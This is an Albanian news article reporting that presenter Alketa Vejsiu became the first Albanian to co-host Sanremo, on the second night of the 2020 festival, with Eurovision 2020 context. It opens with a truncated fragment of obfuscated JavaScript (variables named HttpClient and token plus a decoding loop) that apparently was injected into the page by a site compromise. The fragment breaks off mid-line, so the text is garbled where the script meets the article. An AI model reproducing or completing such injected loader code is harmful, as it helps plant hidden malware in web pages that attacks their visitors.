;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Alketa përshëndet shqiptarët në shqip nga Sanremo

By

Ka filluar zyrtarisht nata e dytë e festivalit më të vjetër në Evropë, “Sanremo 2020”.

Ky festival, nga i cili ka marrë frymëzim për t’u realizuar festivali më i madh muzikor i shteteve në Evropë, “Eurovisioni”, ka sjell këtë vit këngë të ndryshme nga këngëtarë të njohur italianë në skenën e tij.

Më i veçantë për shqiptarët që e kanë ndjekur ndër vite këtë festival, sivjet është fakti që në skenën e tij për të prezantuar është ngjitur për herë të parë në histori një prezantuese shqiptare.

Moderatorja e njohur Alketa Vejsiu, ka qenë njëra ndër prezantueset e natës së dytë, e cila plot krenari është shfaqur në skenën e “Sanremos” e veshur me një fustan ngjyrë rozë tejet elegant.

Ajo ka prezantuar përkrah organizatorit të festivalit, Amadeus, teksa po në të njëjtën natë është ngjitur në skenë për të prezantuar edhe partnerja e futbollistit me famë botërore, Cristiano Ronaldo, Georgina Rodriguez.

Faqja zyrtare e “Sanremo 2020” në rrjetin social Instagram publikoi një video të shkurtër të momenti të hyrjes së prezantueses shqiptare në skenë.

“Mirësevini në Sanremo 2020”, shkruan ata në mbishkrimin e kësaj videoje.

Ndërkohë edhe vet Alketa përndryshe ndau me ndjekësit e saj në rrjetet sociale disa imazhe nga paraqitja e saj glamuroze në këtë ngjarje, e cila për të është ndër më të rëndësishmet në karrierën e saj.

Përndryshe, fituesi i “Sanremo 2020” do të jetë ai që do të përfaqësojë Italinë në “Eurovision 2020” që mbahet në muajin maj, këtë vit në Rotterdam të Holandës.

 

M

Artikuj të ngjashëm